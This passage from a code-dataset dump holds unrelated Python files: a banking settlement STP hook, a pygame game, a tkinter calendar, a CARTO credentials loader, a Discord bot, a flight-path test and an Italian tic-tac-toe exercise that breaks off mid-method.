\"\"\"\n Determine whether or not to trigger the hooks STP action/s\n for an event on the specified object.\n \"\"\"\n if not eventObject.IsKindOf(acm.FInstrument):\n return False\n instrument = eventObject\n if instrument.InsType() not in ['Deposit', 'FRN']:\n return False\n if instrument.IsCallAccount():\n return False\n if instrument.ExpiryDateOnly() != acm.Time.DateToday():\n return False\n return True\n\n def PerformSTP(self, instrument):\n \"\"\"\n Perform the hooks STP action/s for an event on the specified\n object.\n\n Please note that the action does not necessarily occur to the\n event object itself but may occur to some related object/s.\n \"\"\"\n maturing_cash_flows = self.get_maturing_cash_flows(instrument)\n if not maturing_cash_flows:\n LOGGER.info('No maturing cash flows found, skipping.')\n return\n for cash_flow in maturing_cash_flows:\n if cash_flow.CashFlowType() not in ['Fixed Amount', 'Fixed Rate', 'Float Rate']:\n message = \"Maturing cash flow {cash_flow_oid} of type '{cash_flow_type}' found, skipping.\"\n LOGGER.info(message.format(\n cash_flow_oid=cash_flow.Oid(),\n cash_flow_type=cash_flow.CashFlowType()\n ))\n continue\n settle_type_addinfo_name = 'Settle_Type'\n settle_type = cash_flow.AddInfoValue(settle_type_addinfo_name)\n if not settle_type:\n message = \"Additional info '{addinfo_name}' not set on maturing cash flow {cash_flow_oid}, \"\n message += \"skipping.\"\n LOGGER.info(message.format(\n addinfo_name=settle_type_addinfo_name,\n cash_flow_oid=cash_flow.Oid()\n ))\n continue\n settlements = self._get_cash_flow_settlements(cash_flow)\n if not settlements:\n LOGGER.info('No settlements found for maturing cash flow {cash_flow_oid}, skipping.'.format(\n cash_flow_oid=cash_flow.Oid()\n ))\n continue\n for settlement in settlements:\n if settlement.Status() not in ['Authorised', 'Exception']:\n message = \"Settlement {settlement_oid} for maturing cash flow {cash_flow_oid} not in \"\n message += \"'Authorised' or 'Exception' status, skipping.\"\n LOGGER.info(message.format(\n settlement_oid=settlement.Oid(),\n cash_flow_oid=cash_flow.Oid()\n ))\n continue\n settle_instruct_addinfo_name = 'Settle_Instruct'\n current_settle_instruct = settlement.AddInfoValue(settle_instruct_addinfo_name)\n if current_settle_instruct:\n message = \"Settlement {settlement_oid} for maturing cash flow {cash_flow_oid} already \"\n message += \"has additional info '{addinfo_name}' set, skipping.\"\n LOGGER.info(message.format(\n settlement_oid=settlement.Oid(),\n cash_flow_oid=cash_flow.Oid(),\n addinfo_name=settle_instruct_addinfo_name\n ))\n continue\n LOGGER.info('Processing settlement {settlement_oid} for maturing cash flow {cash_flow_oid}.'.format(\n settlement_oid=settlement.Oid(),\n cash_flow_oid=cash_flow.Oid()\n ))\n settlement = settlement.StorageImage()\n # Set Settle_Instruct.\n OperationsSTPFunctions.set_additional_info_value(settlement, settle_instruct_addinfo_name, settle_type)\n # Set Sett_Status_Update.\n OperationsSTPFunctions.set_additional_info_value(settlement, 'Sett_Status_Update', True)\n # Set Settle Amount (if specified).\n settle_amount = cash_flow.AddInfoValue('Settle_Amount')\n if settle_amount:\n OperationsSTPFunctions.set_additional_info_value(settlement, 'Partial_Amount', settle_amount)\n # Hold settlement if applicable.\n if self._should_hold_settlement(settlement, settle_type):\n self._hold_settlement(settlement)\n settlement.Commit()\n\n def get_maturing_cash_flows(self, instrument):\n \"\"\"\n Get any cash flows maturing (paying out) today.\n 
\"\"\"\n maturing_cash_flows = list()\n today = acm.Time.DateToday()\n for cash_flow in instrument.MainLeg().CashFlows().AsArray():\n if cash_flow.PayDate() != today:\n continue\n maturing_cash_flows.append(cash_flow)\n return maturing_cash_flows\n\n def _get_cash_flow_settlements(self, cash_flow):\n \"\"\"\n Get any settlements for a cash flow.\n \"\"\"\n select_expression = 'cashFlow = {cash_flow_oid}'.format(\n cash_flow_oid=cash_flow.Oid()\n )\n return acm.FSettlement.Select(select_expression).AsArray()\n\n def _should_hold_settlement(self, settlement, settle_type):\n \"\"\"\n Determine whether or not a settle_type value should result in\n a settlement being set to hold.\n \"\"\"\n if settlement.Status() != 'Authorised':\n return False\n cash_flow_type = settlement.CashFlow().CashFlowType()\n if cash_flow_type == 'Fixed Amount':\n return self._should_hold_capital_settlement(settle_type)\n elif cash_flow_type in ['Fixed Rate', 'Float Rate']:\n return self._should_hold_interest_settlement(settle_type)\n raise ValueError(\"Unsupported settlement for cash flow type '{cash_flow_type}' specified.\".format(\n cash_flow_type=cash_flow_type\n ))\n\n def _should_hold_capital_settlement(self, settle_type):\n \"\"\"\n Determine whether or not to hold a capital settlement for a\n specified settle_type.\n \"\"\"\n return settle_type in [\n \"Term To Term: Capital and Interest\",\n \"Term To Term: Capital\",\n \"Term To Term: Partial Capital and Interest\",\n \"Term To Term: Partial Capital\",\n \"Term To Call: Capital and Interest\",\n \"Term To Call: Capital\",\n \"Term To Call: Partial Capital and Interest\",\n \"Term To Call: Partial Capital\",\n \"Term To Multiple\",\n \"Pay Out : Interest\"\n ]\n\n def _should_hold_interest_settlement(self, settle_type):\n \"\"\"\n Determine whether or not to hold a interest settlement for a\n specified settle_type\n \"\"\"\n return settle_type in [\n \"Term To Term: Capital and Interest\",\n \"Term To Term: Interest\",\n \"Term To Term: Partial Capital and Interest\",\n \"Term To Call: Capital and Interest\",\n \"Term To Call: Interest\",\n \"Term To Call: Partial Capital and Interest\",\n \"Term To Multiple\",\n \"Pay Out : Capital\"\n ]\n\n def _hold_settlement(self, settlement):\n \"\"\"\n Change the status of a settlement to hold.\n \"\"\"\n LOGGER.info('Holding settlement {settlement_oid}.'.format(\n settlement_oid=settlement.OriginalOrSelf().Oid()\n ))\n settlement.Status('Hold')\n","sub_path":"Extensions/ABSA Operations STP/FPythonCode/TermMaturityInstructionSTPHook.py","file_name":"TermMaturityInstructionSTPHook.py","file_ext":"py","file_size_in_byte":9303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"584650786","text":"import sys\n\nimport pygame\nfrom bullet import Bullet\nfrom alien import Alien\n\ndef check_events(ai_settings, screen, ship, bullets):\n \"\"\"Respond to keypresses and mouse events.\"\"\"\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n check_keydown_events(event, ai_settings, screen, ship, bullets)\n elif event.type == pygame.KEYUP:\n check_keyup_events(event, ai_settings, screen, ship, bullets)\n\ndef update_screen(ai_settings, screen, ship, alien, bullets):\n \"\"\"Update images on the screen and flip the new screen.\"\"\"\n # Redraw the screen during each pass through the loop.\n screen.fill(ai_settings.bg_color)\n ship.blitme()\n alien.draw(screen)\n\n # Redraw all bullets behind ship and aliens.\n for 
bullet in bullets.sprites():\n bullet.draw_bullet()\n # Make the most recently drawn screen visible.\n pygame.display.flip()\n\ndef update_bullets(bullets):\n \"\"\"Update position of bullets and gir rid of old bullets\"\"\"\n # Update bullets positions.\n bullets.update()\n\n # Get rid of bullets that have disappeard.\n for bullet in bullets.copy():\n if bullet.rect.bottom <= 0:\n bullets.remove(bullet)\n\ndef check_keydown_events(event, ai_settings, screen, ship, bullets):\n \"\"\"Respond to key presses\"\"\"\n if event.key == pygame.K_d:\n # Move the ship to the right.\n ship.moving_right = True\n elif event.key == pygame.K_a:\n # Move the ship to the left.\n ship.moving_left = True\n elif event.key == pygame.K_SPACE:\n # Create a new bullet and add it to the bullets group.\n if len(bullets) < ai_settings.bullet_limit:\n fire_bullets(ai_settings, screen, ship, bullets)\n\ndef check_keyup_events(event, ai_settings, screen, ship, bullets):\n \"\"\"Respond to key releases\"\"\"\n if event.key == pygame.K_d:\n # Stop ship from going right\n ship.moving_right = False\n elif event.key == pygame.K_a:\n # Stop ship from going left\n ship.moving_left = False\n\ndef fire_bullets(ai_settings, screen, ship, bullets):\n new_bullet = Bullet(ai_settings, screen, ship, 'left')\n bullets.add(new_bullet)\n new_bullet = Bullet(ai_settings, screen, ship, 'right')\n bullets.add(new_bullet)\n\ndef create_fleet(ai_settings, screen, aliens):\n \"\"\"Create a full fleet of aliens.\"\"\"\n # Create an alien and find the number aliens in a row.\n alien = Alien(ai_settings, screen)\n number_aliens_x = get_number_aliens_x(ai_settings, alien.rect.width)\n\n for alien_number in range(number_aliens_x):\n create_alien(ai_settings, screen, aliens, alien_number)\n\ndef get_number_aliens_x(ai_settings, alien_width):\n available_space_x = ai_settings.screen_width - 2 * alien_width\n number_aliens_x = int(available_space_x / (2 * alien_width))\n return number_aliens_x\n\ndef create_alien(ai_settings, screen, aliens, alien_number):\n alien = Alien(ai_settings, screen)\n alien_width = alien.rect.width\n alien.x = alien_width + 2 * alien_width * alien_number\n alien.rect.x = alien.x\n aliens.add(alien)\n","sub_path":"game_functions.py","file_name":"game_functions.py","file_ext":"py","file_size_in_byte":3171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"387085785","text":"from tkinter import *\r\nimport tkinter as tk\r\nimport time\r\nimport pandas as pd\r\n\r\nclass CalendarWidget():\r\n def __init__(self, startTime):\r\n # 프레임 상단에 표시되는 요일의 약어\r\n self.dayAbbreviations = (\"Mo\", \"Tu\", \"We\", \"Th\", \"Fr\", \"Sa\", \"Su\")\r\n\r\n self.dayPositions = {\r\n \"Monday\": 1,\r\n \"Tuesday\":2,\r\n \"Wednesday\": 3,\r\n \"Thursday\": 4,\r\n \"Friday\": 5,\r\n \"Saturday\": 6,\r\n \"Sunday\": 7,\r\n }\r\n\r\n # 루트 창 대신 최상위 수준으로 창을 만들면 모든 프로젝트에서 작동\r\n\r\n self.calendarWindow = tk.Toplevel()\r\n self.calendarWindow.wm_resizable(0, 0)\r\n self.calendarWindow.title(\"Select Date\")\r\n self.calendarWindow.config(padx=5, pady=5)\r\n self.calendarWindow.rowconfigure(0, weight=1)\r\n\r\n self.calendarFrame = tk.LabelFrame()\r\n self.calendarFrame.destroy()\r\n\r\n photoFrame = tk.Frame(self.calendarWindow)\r\n photoFrame.pack(side = tk.TOP)\r\n buttonsFrame = tk.Frame(self.calendarWindow)\r\n buttonsFrame.pack(side=tk.BOTTOM, fill=tk.X, expand=1)\r\n\r\n #gif 사진 첨부\r\n photo = PhotoImage(file=\"C:\\Python\\python1\\good.gif\")\r\n r = Label( photoFrame, image=photo)\r\n 
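`update_bullets` in the record above iterates over `bullets.copy()` before removing members, because mutating a sprite `Group` while looping over it would skip elements. The pattern in isolation, with a stub sprite so it runs without the rest of the game:

```python
import pygame

pygame.init()

class Dot(pygame.sprite.Sprite):
    def __init__(self, bottom):
        super().__init__()
        self.image = pygame.Surface((2, 2))
        self.rect = self.image.get_rect(bottom=bottom)

bullets = pygame.sprite.Group(Dot(-5), Dot(50))

# Iterate over a copy, exactly as update_bullets() does: removing members
# of the group you are currently looping over would skip items.
for bullet in bullets.copy():
    if bullet.rect.bottom <= 0:
        bullets.remove(bullet)

print(len(bullets))   # 1: only the on-screen bullet survives
```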
r.photo = photo\r\n r.pack()\r\n\r\n # 이전 및 다음 버튼 만들기\r\n tk.Button(buttonsFrame, text=\"< Prev\", command=self.previousMonth).pack(side=tk.LEFT)\r\n tk.Button(buttonsFrame, text=\"Next >\", command=self.nextMonth).pack(side=tk.RIGHT)\r\n tk.Button(buttonsFrame, text=\"생일리스트\", command=self.popup).pack(side=tk.RIGHT)\r\n\r\n # 현재 달에서 시작된 캘린더를 초기화\r\n self.initializeCalendarUI(round(startTime))\r\n\r\n def initializeCalendarUI(self, startTime):\r\n\r\n # find the first day of the month\r\n dayNum = int(time.strftime(\"%d\", time.localtime(startTime)))\r\n self.currentTime = startTime - (dayNum * 86400) + 86400\r\n print(time.strftime(\"%d %B %A\", time.localtime(self.currentTime)))\r\n\r\n\r\n self.currentMonth = time.strftime(\"%m\", time.localtime(self.currentTime))\r\n # 28 일보다 더 짧은 달이 없기 때문에 인덱스 27에서 시작\r\n\r\n monthLength = 27\r\n for i in range(5):\r\n _t = self.currentTime + (86400 * (i + 27))\r\n print(time.strftime(\"%B\", time.localtime(_t)))\r\n if time.strftime(\"%m\", time.localtime(_t)) != self.currentMonth:\r\n print(monthLength)\r\n break\r\n monthLength += 1\r\n\r\n # 이제 우리는 시작일과 달의 길이를 가지므로 달력을 올바르게 생성\r\n try:\r\n if (self.calendarFrame.winfo_exists() == True):\r\n self.calendarFrame.destroy()\r\n except Exception:\r\n print(\"Ignoring \" + str(Exception) + \", first time calendarFrame is being created\")\r\n\r\n self.calendarFrame = tk.LabelFrame(self.calendarWindow,\r\n text=time.strftime(\"%B %Y\", time.localtime(self.currentTime)))\r\n self.calendarFrame.pack(side=tk.TOP, fill=tk.BOTH, expand=1)\r\n\r\n # 프레임 상단에 초기 약어 레이블 생성\r\n for index, i in enumerate(self.dayAbbreviations):\r\n _t = tk.Frame(self.calendarFrame)\r\n _t.grid(column=index + 1, row=0)\r\n tk.Label(_t, text=i).grid(column=1, row=1)\r\n\r\n # 순간에 사용될 리턴 함수를 정의\r\n # 시간 모듈로 문자열로 변환\r\n def buttonFunction(returnTime):\r\n return_time = self.currentTime + (86400 * returnTime)\r\n print(return_time)\r\n print(time.strftime(\"%A %d %B %Y\", time.localtime(return_time)))\r\n self.calendarWindow.destroy()\r\n\r\n # Create all the buttons\r\n row = 1\r\n for i in range(monthLength):\r\n _d = time.localtime(self.currentTime + (86400 * i))\r\n _day = time.strftime(\"%A\", _d)\r\n\r\n\r\n tk.Button(self.calendarFrame, text=(i + 1), command=lambda i=i: buttonFunction(i)).grid(\r\n column=self.dayPositions[_day], row=row, sticky=tk.N + tk.E + tk.W + tk.S)\r\n if self.dayPositions[_day] == 7:\r\n row += 1\r\n\r\n for i in range(7):\r\n self.calendarFrame.columnconfigure(i + 1, weight=1)\r\n for i in range(5):\r\n self.calendarFrame.rowconfigure(i + 1, weight=1)\r\n\r\n # 새 달을 앞으로 스캔하여 다음 달로 이동\r\n def nextMonth(self):\r\n for i in range(32):\r\n _c = time.strftime(\"%m\", time.localtime(self.currentTime + (86400 * i)))\r\n if _c != self.currentMonth:\r\n self.currentTime += 86400 * i\r\n self.initializeCalendarUI(self.currentTime)\r\n break\r\n\r\n #새 달을 앞으로 스캔하여 이전 달로 이동\r\n def previousMonth(self):\r\n for i in range(32):\r\n _c = time.strftime(\"%m\", time.localtime(self.currentTime - (86400 * i)))\r\n if _c != self.currentMonth:\r\n self.currentTime -= 86400 * i\r\n self.initializeCalendarUI(self.currentTime)\r\n break\r\n\r\n def popup(self):\r\n data = pd.read_csv(\"C:\\Python\\python1\\sheet.csv\")\r\n print(data)\r\n\r\n\r\nclass GUI():\r\n def __init__(self):\r\n self.root = tk.Tk()\r\n tk.Button(self.root, text=\"Show Calendar\", command=lambda: CalendarWidget(time.time())).pack(side=tk.TOP)\r\n\r\n\r\n\r\nnew = 
GUI()\r\nnew.root.mainloop()","sub_path":"naeyoungTest2.py","file_name":"naeyoungTest2.py","file_ext":"py","file_size_in_byte":5583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"394397662","text":"import json\nimport requests\n\n\ndef load_carto_credentials(filepath):\n \"\"\"Load credentials from file. It must contain the following attributes.\n More information at https://api-docs.carto.com/.\n - api_base_url\n - client_id\n - client_secret\n \"\"\"\n with open(filepath, \"r\") as f:\n content = json.load(f)\n\n if \"api_base_url\" not in content:\n raise Exception(\"Missing attribute 'api_base_url'\")\n\n if \"client_id\" not in content:\n raise Exception(\"Missing attribute 'client_id'\")\n\n if \"client_secret\" not in content:\n raise Exception(\"Missing attribute 'client_secret'\")\n\n url = \"https://auth.carto.com/oauth/token\"\n headers = {\"Content-Type\": \"application/x-www-form-urlencoded\"}\n data = {\n \"grant_type\": \"client_credentials\",\n \"audience\": \"carto-cloud-native-api\",\n \"client_id\": content[\"client_id\"],\n \"client_secret\": content[\"client_secret\"],\n }\n response = requests.post(url, headers=headers, data=data)\n oauth_token = response.json()[\"access_token\"]\n\n return {\n \"apiVersion\": \"v3\",\n \"apiBaseUrl\": content[\"api_base_url\"],\n \"accessToken\": oauth_token,\n }\n","sub_path":"bindings/pydeck-carto/pydeck_carto/credentials.py","file_name":"credentials.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"404451645","text":"s = list(input())\nk = int(input())\nans = 0\ncount = 1\nfor i in range(len(s)-1):\n if s[i] == s[i+1]:\n count += 1\n else:\n ans += count//2\n count = 1\nans += count//2\nif len(set(s)) == 1:\n print(len(s)*k//2)\n exit()\nif s[0] != s[-1]:\n ans *= k\nelse:\n left = 0\n right = 0\n index = 0\n while index < len(s) and s[0] == s[index]:\n left += 1\n index += 1\n index = len(s)-1\n while index >= 0 and s[-1] == s[index]:\n right += 1\n index -= 1\n ans *= k\n ans -= ((right//2) + (left//2) - (right + left)//2) * (k-1)\nprint(ans)","sub_path":"Python_codes/p02891/s509223332.py","file_name":"s509223332.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"604634910","text":"import os\n\nimport discord\nfrom discord.ext import commands\nfrom dotenv import load_dotenv\n\n# from welcome_cog import WelcomeCog\nfrom appointments_cog import AppointmentsCog\nfrom armin import Armin\nfrom calmdown import Calmdown\nfrom christmas_cog import ChristmasCog\nfrom easter_cog import EasterCog\nfrom github import Github\nfrom help.help import Help\nfrom learninggroups import LearningGroups\nfrom links_cog import LinksCog\nfrom module_information.module_information import ModuleInformation\nfrom news_cog import NewsCog\nfrom poll_cog import PollCog\nfrom roles_cog import RolesCog\nfrom support_cog import SupportCog\nfrom text_commands_cog import TextCommandsCog\n# from change_log import ChangeLogCog\nfrom voice_cog import VoiceCog\nfrom welcome_cog import WelcomeCog\nfrom xkcd import Xkcd\n\n\n# .env file is necessary in the same directory, that contains several strings.\nload_dotenv()\nTOKEN = os.getenv('DISCORD_TOKEN')\nGUILD = int(os.getenv('DISCORD_GUILD'))\nACTIVITY = os.getenv('DISCORD_ACTIVITY')\nOWNER = int(os.getenv('DISCORD_OWNER'))\nROLES_FILE = 
os.getenv('DISCORD_ROLES_FILE')\nHELP_FILE = os.getenv('DISCORD_HELP_FILE')\nCATEGORY_LERNGRUPPEN = os.getenv(\"DISCORD_CATEGORY_LERNGRUPPEN\")\nPIN_EMOJI = \"📌\"\n\nintents = discord.Intents.default()\nintents.members = True\nbot = commands.Bot(command_prefix='!', help_command=None, activity=discord.Game(ACTIVITY), owner_id=OWNER,\n intents=intents)\nbot.add_cog(AppointmentsCog(bot))\nbot.add_cog(TextCommandsCog(bot))\nbot.add_cog(PollCog(bot))\nbot.add_cog(RolesCog(bot))\nbot.add_cog(WelcomeCog(bot))\nbot.add_cog(ChristmasCog(bot))\nbot.add_cog(SupportCog(bot))\nbot.add_cog(NewsCog(bot))\nbot.add_cog(LinksCog(bot))\n# bot.add_cog(ChangeLogCog(bot))\nbot.add_cog(VoiceCog(bot))\nbot.add_cog(EasterCog(bot))\nbot.add_cog(Armin(bot))\nbot.add_cog(LearningGroups(bot))\nbot.add_cog(ModuleInformation(bot))\nbot.add_cog(Xkcd(bot))\nbot.add_cog(Help(bot))\nbot.add_cog(Calmdown(bot))\nbot.add_cog(Github(bot))\n\n\n\ndef get_reaction(reactions):\n \"\"\" Returns the reaction, that is equal to the specified PIN_EMOJI,\n or if that reaction does not exist in list of reactions, None will be returned\"\"\"\n\n for reaction in reactions:\n if reaction.emoji == PIN_EMOJI:\n return reaction\n return None\n\nasync def pin_message(message):\n \"\"\" Pin the given message, if it is not already pinned \"\"\"\n\n if not message.pinned:\n await message.pin()\n\n\nasync def unpin_message(message):\n \"\"\" Unpin the given message, if it is pinned, and it has no pin reaction remaining. \"\"\"\n\n if message.pinned:\n reaction = get_reaction(message.reactions)\n if reaction is None:\n await message.unpin()\n\n\n@bot.event\nasync def on_ready():\n print(\"Client started!\")\n\n\n@bot.event\nasync def on_raw_reaction_add(payload):\n if payload.user_id == bot.user.id:\n return\n\n if payload.emoji.name == PIN_EMOJI:\n channel = await bot.fetch_channel(payload.channel_id)\n message = await channel.fetch_message(payload.message_id)\n await pin_message(message)\n\n\n@bot.event\nasync def on_raw_reaction_remove(payload):\n if payload.emoji.name == PIN_EMOJI:\n channel = await bot.fetch_channel(payload.channel_id)\n message = await channel.fetch_message(payload.message_id)\n await unpin_message(message)\n\n\n@bot.event\nasync def on_voice_state_update(member, before, after):\n if before.channel != after.channel and after.channel and \"Lerngruppen-Voice\" in after.channel.name:\n category = await bot.fetch_channel(CATEGORY_LERNGRUPPEN)\n voice_channels = category.voice_channels\n\n for voice_channel in voice_channels:\n if len(voice_channel.members) == 0:\n return\n\n await category.create_voice_channel(f\"Lerngruppen-Voice-{len(voice_channels) + 1}\")\n\n\nbot.run(TOKEN)\n","sub_path":"fernuni_bot.py","file_name":"fernuni_bot.py","file_ext":"py","file_size_in_byte":3831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"59854600","text":"import unittest\n\nfrom Home.Guidance.FlightPathSimFile import FlightPathSim\n\n\nKnots2MetersPerSecond = 0.514444444\n\n\nclass TestFlightPathSimFile(unittest.TestCase):\n\n def setUp(self) -> None:\n route_a320_charles_de_gaulle_lisbonne = \\\n 'ADEP/LFPG/26R-LAIGLE-ROLEN-PEPON-KURIS-TERPO-ERIGA-INBAB-ATLEN-' \\\n 'DEVAR-ASTURIAS-KUVAN-BISMU-BARKO-FATIMA-ADES/LPPT/03'\n waypoints = 'ROLEN-PEPON-KURIS-TERPO-ERIGA-INBAB'\n waypoints = 'ROLEN-TERPO-ATLEN-DEVAR-BISMU-FATIMA-ADES/LPPT/03'\n waypoints = 'LAMSO-EVELI-BASNO-PAMPUS-IVLUT-LUNIX-RENDI-EDUPO-NAPRO-DEPAD-AMOSU-MISGO-COLA-ROLIS-ADES/EDDF/25C'\n waypoints = 
'LAMSO-EVELI-BASNO-PAMPUS-ADES/EDDF/25C'\n self.str_route = waypoints\n\n def test_flight_path(self):\n flight_path = FlightPathSim(\n route=self.str_route,\n aircraftICAOcode='A320',\n RequestedFlightLevel=330,\n cruiseMach=0.82,\n takeOffMassKilograms=68000.0,\n windSpeedMetersPerSecond=25*Knots2MetersPerSecond,\n windDirectionDegrees=25\n )\n\n self.assertEqual(type(flight_path), FlightPathSim)\n\n def test_flight_path_compute_flight(self):\n flight_path = FlightPathSim(\n route=self.str_route,\n aircraftICAOcode='A320',\n RequestedFlightLevel=330,\n cruiseMach=0.82,\n takeOffMassKilograms=68000.0,\n windSpeedMetersPerSecond=25*Knots2MetersPerSecond,\n windDirectionDegrees=25\n )\n\n # If we want to generate the whole flight using the old code, use the .computeFlight function\n flight_path.computeFlight(deltaTimeSeconds=1.0)\n flight_path.createFlightOutputFiles()\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"FlightDynamics/Home/tests_dir/tests_guidance/tests_flight_path_sim_file.py","file_name":"tests_flight_path_sim_file.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"317960792","text":"'''\nIl tris e' un popolarissimo gioco. Si gioca su una griglia quadrata di 3x3 caselle.\nA turno, i due giocatori scelgono una cella vuota e vi disegnano il proprio simbolo \n(un giocatore ha come simbolo una \"o\" e l'avversario una 'x'). \nVince il giocatore che riesce a disporre tre dei propri simboli in linea retta \norizzontale, verticale o diagonale. Se la griglia viene riempita \nsenza che nessuno dei giocatori sia riuscito a completare una linea \nretta di tre simboli, il gioco finisce in parita'. Nel caso in cui il gioco \nfinisse in parita', la partita e' detta \"patta\". \nPer convenzione a griglia vuota la prima mossa spetta sempre al giocatore 'o'\n\nUna configurazione del gioco e' dunque univocamente determinata dal contenuto della griglia.\n\nNel seguito assumiamo che il contenuto della griglia sia rappresentato tramite lista di liste.\nLa dimensione della lista di liste M e' 3x3 ed M[i][j] contiene '', 'x', o 'o' a seconda \nche la cella della griglia appartenente all'iesima riga e j-ma colonna sia ancora libera, \ncontenga il simbolo 'x' o contenga il simbolo 'o'. \n\nData una configurazione C del gioco, l'albero di gioco per C e' l'albero che \nsi ottiene ricorsivamente partendo dalla configurazione C e assegnando come figli le configurazioni \nche e' possibile ottenere da C con una mossa ulteriore del gioco. Ovviamente risulteranno \nfoglie dell'albero i possibili esiti della partita vale a dire le diverse configurazioni cui e' \npossibile arrivare partendo da C e che rappresentano patte, vittorie per 'o' o vittorie per 'x'.\nSe veda ad esempio l'immagine albero_di_gioco.png che mostra l' albero di gioco che si ottiene a partire \ndalla configurazione rappresentata da [['x', 'o', 'o'], ['x', 'x', 'o'], ['', '', '']]\n \n\nSi consideri la seguente Classe di oggetti:\n\n\nclass NodoTris:\n def __init__(self, griglia):\n self.nome = griglia\n self.lista_figli = [] \n\n\nBisogna progettare le seguente funzione \n\ngen_tree(griglia)\nche, data la configurazione di gioco griglia, costruisce l'albero di gioco che si ottiene a partire \ndalla configurazione griglia e ne restituisce la radice. 
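The Knots2MetersPerSecond constant used by the FlightPathSim tests above can be checked against first principles: one knot is one nautical mile (1852 m) per hour. A minimal sketch of that check:

    # 1 knot = 1852 m / 3600 s; the test module hard-codes 0.514444444
    knot_in_mps = 1852.0 / 3600.0
    assert abs(knot_in_mps - 0.514444444) < 1e-8
    # so the 25 kt wind used in the tests is roughly 12.86 m/s
    print(25 * knot_in_mps)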
I nodi dell'albero devono essere\noggetti della classe NodoTris.\n\nPer testare la correttezza della vostra implementazione di gen_tree() il grade utilizzera' quattro metodi \ndella classe NodoTris che dovete comunque implementare: \n\n1)\ntipo(self)\nche, dato un nodo NodoTris, restituisce:\n 'o' se la configurazione rappresentata dal nodo e' una configurazione di vittoria per il giocatore 'o'\n 'x' se la configurazione rappresentata dal nodo e' una configurazione di vittoria per il giocatore 'x'\n '-' se la configurazione rappresentata dal nodo e' una configurazione di patta\n '?' se la configurazione rappresentata dal nodo e' una configurazione di gioco non ancora terminato\n\n2)\nesiti(self)\nche, dato un nodo radice di un albero di gioco, restituisce una tripla con i possibili \nesiti della partita che ha come configurazione iniziale quella rappresentata dal nodo. \nPiu' precisamente: il primo elemento della tripla e' il numero di patte possibili, \nil secondo e' il numero di possibili vittorie per il giocatore 'o' mentre il terzo elemento \ne' il numero di possibili vittorie per il giocatore 'x'.\n\n3)\nvittorie_livello(self, giocatore, h)\nche, dato un nodo radice di un albero di gioco, uno dei due giocatori ed un intero h,\nrestituisce il numero di nodi che rappresentano una vittoria per il giocatore e si \ntrovano ad altezza h nell'albero. In altri termini restituisce il numero di vittorie possibili \nin esattamente h mosse per il giocatore specificato, nella partita che ha come configurazione iniziale \nquella rappresentata dalla radice dell'albero.\n\n4)\nstrategia_vincente(self,giocatore)\nche, dato un nodo radice di un albero di gioco ed uno dei due giocatori, restituisce True o False. \nRestituisce True se giocatore ha una strategia vincente nella partita \nche ha come configurazione iniziale quella rappresentata dal nodo radice, False altrimenti.\n\nNota che un giocatore ha una strategia vincente rispetto ad una certa configurazione se, \nqualunque siano le mosse dell'avversario ha sempre la possibilita' di rispondere in modo \nche la partita termini con la sua vittoria.\n\nPotete ovviamente definire ulteriori funzioni e altri metodi per la Classe NodiTris \nse li ritenete utili al fine della risoluzione del compito.\n\nPotete assumere che le configurazioni di gioco rappresentate da griglia siano sempre configurazioni \nlecite (vale a dire ottenute dopo un certo numero di mosse a parire dalla griglia vuota).\n\n\nAVVERTENZE: non usare caratteri non ASCII, come le lettere accentate; non\nimportare moduli che non sono nella libreria standard.\n\nATTENZIONE: i test vengono eseguiti con un timeout globale di 2*N secondi (se il grader esegue N test).\n'''\n\nfrom copy import deepcopy\n\ng0=[['', '', ''], ['', '', ''], ['', '', '']]\ng1=[['x', 'o', 'o'], ['x', 'x', 'o'], ['', '', '']]\ng2=[['x', 'o', 'o'], ['x', 'x', 'o'], ['o', 'x', 'o']]\ng3=[['x', 'o', 'o'], ['x', 'x', 'o'], ['o', '', 'x']]\ng4=[['o', 'x', 'x'], ['x', 'o', 'o'], ['o', 'o', 'x']]\n\ndef fp(row):\n\trow = deepcopy(row)\n\tfor x in range(0, 3):\n\t\tif row[x] == '':\n\t\t\trow[x] = ' '\n\treturn row\n\t\ndef other(giocatore):\n\treturn ['o', 'x'][int(giocatore == 'o')]\n\t\t\nclass NodoTris:\n\tdef __countsymbols__(self, symbol):\n\t\treturn sum([row.count(symbol) for row in self.grid])\n\t\t\n\tdef __getCurrentPlayer__(self):\n\t\tocount, xcount = self.__countsymbols__('o'), self.__countsymbols__('x')\n\t\treturn ['x', 'o'][int(xcount >= ocount)]\n\t\n\tdef __assertGridDetails__(self):\n\t\tself.current_player = 
self.__getCurrentPlayer__() \n\t\tself.isIncomplete = False\n\t\tfor row in self.grid:\n\t\t\tif '' in row:\n\t\t\t\tself.isIncomplete = True\n\t\t\t\tbreak\n\t\t\t\t\n\tdef __test_horizontal_win__(self):\n\t\tfor row in self.grid:\n\t\t\t# print(\"analyzing row: {} | win: {} | set: {}\".format(row, len(set(row)) == 1 and not '' in row, set(row)))\n\t\t\tif len(set(row)) == 1 and not '' in row:\n\t\t\t\treturn row[0]\n\t\n\tdef __test_vertical_win__(self):\n\t\tfor col in range(0, 3):\n\t\t\tline = [self.grid[0][col], self.grid[1][col], self.grid[2][col]]\n\t\t\t# print(\"analyzing column: {} | win: {} | set: {}\".format(line, len(set(line)) == 1 and not '' in line, set(line)))\n\t\t\tif len(set(line)) == 1 and not '' in line:\n\t\t\t\treturn line[0]\n\t\t\t\t\n\tdef __test_diagonal_win__(self):\n\t\tline1 = [self.grid[0][0], self.grid[1][1], self.grid[2][2]]\n\t\tline2 = [self.grid[0][2], self.grid[1][1], self.grid[2][0]]\n\t\tif len(set(line1)) == 1 and not '' in line1:\n\t\t\treturn self.grid[0][0]\n\t\telif 